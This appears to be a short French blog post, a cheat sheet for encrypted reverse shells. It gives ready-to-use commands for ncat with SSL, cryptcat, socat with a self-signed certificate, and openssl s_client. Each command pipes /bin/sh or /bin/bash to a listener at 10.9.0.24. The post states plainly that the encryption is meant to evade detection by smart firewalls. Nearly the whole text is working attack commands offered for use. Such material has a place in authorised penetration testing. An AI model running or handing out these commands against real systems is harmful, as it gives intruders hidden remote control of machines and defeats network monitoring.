Reverse shell encrypté

Netcat (nc) ne supporte l’encryption et cela permet d’être détecté facilement (firewall intelligent). Voici donc quelques façons d’améliorer la confidentialité des communications

ncat

apt install ncat
ncat -l 443 --ssl -v
ncat 10.9.0.24 --ssl -e /bin/bash -v

cryptcat


cryptcat -lvp 4444 -k mysecretkey
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|cryptcat 10.9.0.24 4444 -k mysecretkey >/tmp/f

socat

openssl req -newkey rsa:2048 -nodes -keyout r0cker.key -x509 -days 1000 -subj '/CN=www.r0cker.local/O=Best Tech./C=CA' -out r0cker.crt
cat r0cker.key r0cker.crt > r0cker.pem
socat -d -d OPENSSL-LISTEN:4443,cert=r0cker.pem,verify=0,fork STDOUT
socat OPENSSL:10.9.0.24:4443,verify=0 EXEC:/bin/bash

openssl reverse shell

openssl s_server -quiet -key r0cker.pem -cert r0cker.pem -port 5555 #voir la section socat pour la création d'un certificat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|openssl s_client -quiet -connect 10.9.0.24:5555 >/tmp/f

Leave a Reply